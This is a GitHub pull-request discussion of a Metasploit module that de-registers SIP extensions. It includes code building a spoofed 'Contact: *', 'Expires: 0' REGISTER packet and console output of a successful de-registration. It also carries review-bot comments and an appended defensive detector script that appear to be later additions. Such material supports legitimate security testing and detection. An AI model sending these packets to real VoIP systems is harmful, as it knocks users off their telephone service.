
sip_deregister.rb #1032

Merged
merged 4 commits into from Nov 27, 2012

Conversation

Contributor

ChrisJohnRiley commented Nov 7, 2012

Module to de-register SIP end-points (UDP)

Contributor

jvazquez-r7 commented Nov 8, 2012

Eyeballed, code looks good, fake test vs smartphone:

msf  auxiliary(sip_deregister) > rexploit
[*] Reloading module...
[*] Sending deregistration packet to: juan vazquez@localhost
[-] "juan vazquez" : Undefined error code 501
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

@jvazquez-r7 jvazquez-r7 commented on the diff Nov 8, 2012

modules/auxiliary/voip/sip_deregister.rb
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::Udp
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'SIP Deregister Extension',
+ 'Version' => '$Revision$',
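Review bot: `'Version' => '$Revision$'` on the last line of this hunk is the old SVN keyword that the framework no longer expands, so the key can be dropped from the info hash. The double blank lines after `##` and after `require 'msf/core'` can also be collapsed to one each; msftidy is picky about whitespace in this tree.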
@jvazquez-r7

jvazquez-r7 Nov 8, 2012

Contributor

not needed anymore

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Nov 8, 2012

modules/auxiliary/voip/sip_deregister.rb
+ req << "From: \"#{ext}\"<sip:#{conn_string}>" + "\r\n"
+ req << "Call-ID: #{(rand(100)+100)}#{ip}" + "\r\n"
+ req << "CSeq: 1 REGISTER" + "\r\n"
+ req << "Contact: *" + "\r\n"
+ req << "Expires: 0" + "\r\n"
+ req << "Content-Length: 0" + "\r\n\r\n"
+
+ udp_sock.put(req)
+
+ while (r = udp_sock.recvfrom(65535, 3) and r[1])
+ parse_reply(r)
+ end
+
+ rescue Errno::EACCES
+ ensure
+ udp_sock.close if udp_sock
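Review bot: the bare `rescue Errno::EACCES` just before `ensure` swallows the failure silently, so a run that never managed to send the packet still ends with "Auxiliary module execution completed" and no hint why; give the rescue a body such as `print_error("Permission denied sending to #{ip}")` (or `vprint_error`) so the user can tell a socket problem from a registrar that simply did not answer. The `udp_sock.close if udp_sock` in the `ensure` duplicates what `disconnect_udp` already does and can go. Minor: `Call-ID: #{(rand(100)+100)}#{ip}` yields only 100 distinct values per target, so repeated runs reuse Call-IDs; a longer random token (e.g. `Rex::Text.rand_text_alphanumeric(16)`) keeps them unique.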
@jvazquez-r7

jvazquez-r7 Nov 8, 2012

Contributor

disconnect_udp will do it for you

Contributor

jvazquez-r7 commented Nov 8, 2012

msftidy complains

$ tools/msftidy.rb modules/auxiliary/voip/sip_deregister.rb 
sip_deregister.rb:68 - [WARNING] Spaces at EOL
sip_deregister.rb:86 - [WARNING] Spaces at EOL
Contributor

ChrisJohnRiley commented Nov 8, 2012

501 is an odd error message (not implemented). Did the de-register take effect?

Perhaps you could email me a pcap so I can check?

On 8 Nov 2012 21:44, "Juan Vazquez" notifications@github.com wrote:

> Eyeballed, code looks good, fake test vs smartphone:
>
> msf auxiliary(sip_deregister) > rexploit
> [*] Reloading module...
> [*] Sending deregistration packet to: juan vazquez@localhost
> [-] "juan vazquez" : Undefined error code 501
> [*] Scanned 1 of 1 hosts (100% complete)
> [*] Auxiliary module execution completed

Removed EOL spaces
Removed unrequired udp_sock.close
Contributor

jvazquez-r7 commented Nov 8, 2012

Don't worry, just a fast test versus a fake VoIP install, to check that the request is well generated and the response is being parsed. And the SIP deregister packet looks good to me, so I'm going to merge; feel free to share a pcap of it working if you would like, it is always helpful :)

Contributor

jvazquez-r7 commented Nov 8, 2012

Just a last question, is it always working for you, even when not using 5060 as src port?

thanks :)

Contributor

ChrisJohnRiley commented Nov 9, 2012

It worked for me as long as the criteria were met (i.e. SIP over UDP enabled and extension using UDP as protocol).

The SRC port shouldn't be an issue really.

The 501 error from your tests was because you had a space in the extension name (not supported).

On 8 Nov 2012 23:34, "Juan Vazquez" notifications@github.com wrote:

> Just a last question, is it always working for you, even when not using 5060 as src port?
>
> thanks :)

Added checks for Extension and Domain
Altered error handling on no response
Owner

ChrisJohnRiley commented on 6482de4 Nov 10, 2012

This should deal with the 501 error you saw
(spaces in the Extension or Domain are not supported in the RFC)

Contributor

jvazquez-r7 commented Nov 27, 2012

Tested successfully when the SIP provider doesn't require REGISTER / User auth, will update the description a little by myself before merging:

Output, with response output for my own debugging purposes :)

msf > use auxiliary/voip/sip_deregister 
msf  auxiliary(sip_deregister) > show options
Module options (auxiliary/voip/sip_deregister):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     example.com      yes       Use a specific SIP domain
   EXTENSION  100              yes       The specific extension or name to target
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      5060             yes       The target port
   SRCADDR    192.168.1.1      yes       The sip address the spoofed call is coming from
   THREADS    1                yes       The number of concurrent threads
msf  auxiliary(sip_deregister) > set RHOSTS 192.168.1.147
RHOSTS => 192.168.1.147
msf  auxiliary(sip_deregister) > set DOMAIN 192.168.1.147
DOMAIN => 192.168.1.147
msf  auxiliary(sip_deregister) > set EXTENSION juan
EXTENSION => juan
msf  auxiliary(sip_deregister) > set SRCADDR 192.168.1.129
SRCADDR => 192.168.1.129
msf  auxiliary(sip_deregister) > show options
Module options (auxiliary/voip/sip_deregister):
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     192.168.1.147    yes       Use a specific SIP domain
   EXTENSION  juan             yes       The specific extension or name to target
   RHOSTS     192.168.1.147    yes       The target address range or CIDR identifier
   RPORT      5060             yes       The target port
   SRCADDR    192.168.1.129    yes       The sip address the spoofed call is coming from
   THREADS    1                yes       The number of concurrent threads
msf  auxiliary(sip_deregister) > set CPORT 5060
CPORT => 5060
msf  auxiliary(sip_deregister) > run
[*] Sending deregistration packet to: juan@192.168.1.147
[*] res: SIP/2.0 200 OK
Via: SIP/2.0/UDP 192.168.1.129
From: "juan"
To: "juan";tag=b65d1210as
Call-ID: 158192.168.1.147
CSeq: 1 REGISTER
Server: Brekeke SIP Server rev.333 Evaluation
Expires: 0
Date: Tue, 27 Nov 2012 17:22:51 GMT
Content-Length: 0
[+] "juan" de-registered [200 OK]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(sip_deregister) > 
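The two technical points in this thread, that an extension or domain containing whitespace is not a valid SIP URI component (the cause of the 501 above) and that a REGISTER carrying `Contact: *` with `Expires: 0` removes every binding for the address-of-record, are easy to check mechanically on the registrar or monitoring side. The Ruby below is an added example, not code from the sip_deregister module or the PR: it parses a SIP message, validates extension/domain tokens, classifies a REGISTER as a remove-all deregistration (RFC 3261 section 10.2.2), and flags the request/response pair when the registrar accepted such a request with a 2xx rather than challenging it. The function names (`parse_sip`, `classify_register`, `alert_on_deregistration?`) are my own, and the sample request and response are constructed to mirror the exchange shown in the test output, not captured traffic.

```ruby
# Added example (not part of sip_deregister.rb or the PR): a small SIP-message
# classifier that a registrar-side log monitor could run over captured REGISTER
# requests and the responses they received.

# Parse a SIP message into [start_line, headers, body].
# Header names are lower-cased; repeated headers are kept as arrays.
def parse_sip(raw)
  head, _sep, body = raw.partition("\r\n\r\n")
  lines = head.split("\r\n")
  start_line = lines.shift.to_s
  headers = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    name, value = line.split(':', 2)
    next if value.nil?
    headers[name.strip.downcase] << value.strip
  end
  [start_line, headers, body]
end

# The SIP URI grammar (RFC 3261 section 19.1) allows no whitespace in the user
# or host part, so a value such as "juan vazquez" produces malformed From/To
# headers; this is the check the "Added checks for Extension and Domain" commit
# is about.
def valid_sip_token?(value)
  !value.nil? && !value.empty? && value !~ /\s/
end

# Classify a REGISTER request:
#   :remove_all   - "Contact: *" plus "Expires: 0" (drops every binding, RFC 3261 10.2.2)
#   :register     - ordinary registration or refresh
#   :not_register - some other method or a response
def classify_register(raw)
  start_line, headers, _body = parse_sip(raw)
  return :not_register unless start_line.start_with?('REGISTER ')
  contact = headers['contact'].first.to_s
  expires = headers['expires'].first.to_s
  (contact == '*' && expires == '0') ? :remove_all : :register
end

# Numeric status code of a response ("SIP/2.0 200 OK" -> 200), nil for requests.
def response_status(raw)
  start_line, _headers, _body = parse_sip(raw)
  m = start_line.match(%r{\ASIP/2\.0 (\d{3})})
  m ? m[1].to_i : nil
end

# A remove-all REGISTER that the registrar answered with 2xx instead of a
# 401/407 challenge means any sender who knew the extension could drop the
# binding; that is the condition worth alerting on.
def alert_on_deregistration?(request_raw, response_raw)
  classify_register(request_raw) == :remove_all &&
    (200..299).cover?(response_status(response_raw).to_i)
end

# Constructed sample request, shaped like the one the module sends.
SAMPLE_REQUEST = [
  'REGISTER sip:192.168.1.147 SIP/2.0',
  'Via: SIP/2.0/UDP 192.168.1.129',
  'From: "juan"<sip:juan@192.168.1.147>',
  'To: "juan"<sip:juan@192.168.1.147>',
  'Call-ID: 158192.168.1.147',
  'CSeq: 1 REGISTER',
  'Contact: *',
  'Expires: 0',
  'Content-Length: 0'
].join("\r\n") + "\r\n\r\n"

# Constructed sample response, shaped like the 200 OK in the thread.
SAMPLE_RESPONSE = [
  'SIP/2.0 200 OK',
  'Via: SIP/2.0/UDP 192.168.1.129',
  'From: "juan"',
  'To: "juan";tag=b65d1210as',
  'Call-ID: 158192.168.1.147',
  'CSeq: 1 REGISTER',
  'Expires: 0',
  'Content-Length: 0'
].join("\r\n") + "\r\n\r\n"

if __FILE__ == $0
  puts "extension 'juan' valid?         #{valid_sip_token?('juan')}"
  puts "extension 'juan vazquez' valid?  #{valid_sip_token?('juan vazquez')}"
  puts "request class:  #{classify_register(SAMPLE_REQUEST)}"
  puts "response code:  #{response_status(SAMPLE_RESPONSE)}"
  puts "alert?          #{alert_on_deregistration?(SAMPLE_REQUEST, SAMPLE_RESPONSE)}"
end
```

On the sample pair above the classifier returns `:remove_all`, the response parses as 200, and the pair is flagged; swapping the 200 for a 401 challenge, or the `Contact: *` for a concrete contact URI, clears the alert. A registrar that requires authentication for REGISTER (the case in which jvazquez notes the module does not succeed) never produces the flagged combination.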

@jvazquez-r7 jvazquez-r7 merged commit 6482de4 into rapid7:master Nov 27, 2012

1 check passed: The Travis build passed